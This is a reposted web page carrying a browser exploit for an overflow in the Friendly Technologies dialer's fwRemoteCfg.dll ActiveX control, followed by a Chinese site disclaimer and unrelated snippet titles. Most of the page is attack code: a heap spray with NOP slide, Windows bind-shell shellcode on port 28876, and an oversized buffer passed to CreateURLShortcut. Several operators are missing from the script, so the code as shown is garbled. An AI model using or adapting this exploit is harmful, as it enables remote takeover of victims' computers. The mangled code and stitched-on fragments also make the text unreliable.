时间:2021-05-25
<!--
"Friendly Technologies" provide software like L2TP and PPPoE clients to ISPs,
who give the software to their customers on CD so they have less trouble setting up thire connections.
They also provide remote configuration solutions .. not the best idea if you ask me.
An overflow exists in fwRemoteCfg.dll provided with the dialer,
an example of the dialer can be found here:
==========================================================
|| Greetz to the binaryvision crew ||
|| Come visit @ http://)
-->
<html>
<title>Friendly Technologies - wayyy too friendly...</title>
<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id="sucker"></object>
<input type="button" value="Exploit!" onClick="exploit()">
<script>
function exploit() {
var Evil = ""; // Our Evil Buffer
var DamnIE = "\x0C\x0C\x0C\x0C"; // Damn IE changes address when not in the 0x00 - 0x7F range :(
// Need to use heap spray rather than overwrite EIP ...
// Skyland win32 bindshell (28876/tcp) shellcode
var ShellCode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
var payLoadSize = ShellCode.length * 2; // Size of the shellcode
var SprayToAddress = 0x0C0C0C0C; // Spray up to there, could make it shorter.
var spraySlide = unescape("%u9090%u9090"); // Nop slide
var heapHdrSize = 0x38; // size of heap header blocks in MSIE, hopefully.
var BlockSize = 0x100000; // Size of each block
var SlideSize = BlockSize - (payLoadSize heapHdrSize); // Size of the Nop slide
var heapBlocks = (SprayToAddress - 0x100000) / BlockSize; // Number of blocks
spraySlide = MakeNopSlide(spraySlide, SlideSize); // Create our slide
// [heap header][nopslide][shellcode]
memory = new Array();
for (k = 0; k < heapBlocks; k )
memory[k] = spraySlide ShellCode;
// Create Evil Buffer
while(Evil.length < 800)
Evil = "A";
Evil = DamnIE;
// Pwn
sucker.CreateURLShortcut("con", "con", Evil, 1); // Using 'con' as filename, we dont really want to make a file.
}
function MakeNopSlide(spraySlide, SlideSize){
while(spraySlide.length * 2 < SlideSize)
spraySlide = spraySlide;
spraySlide = spraySlide.substring(0, SlideSize / 2);
return spraySlide;
}
</script>
</html>
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
在Intermet上,应用最广的是ActiveXControl技术,也就是ActiveX控件技术,简称AC.AC-般是DLL形式的,因此必须在“容器
安装Remote-SSH并配置首先打开你的VSCode,找到Extensions,搜索Remote,下载Remote-Developoment插件,会自动安装其
之前的项目,引用electron的remote可以直接调用electron.remote来去使用,而近期使用electron却频繁报错???踩坑后我快速去查看了
From&thx2:http://badishi.com/poison-ivy-exploit-metasploit-module/https://twitte
用C#编写ActiveX控件(一)前些日子做一个Web项目,必须自己编写一个ActiveX控件。如今的ActiveX控件大多是使用VB/C++来开发的,而我对他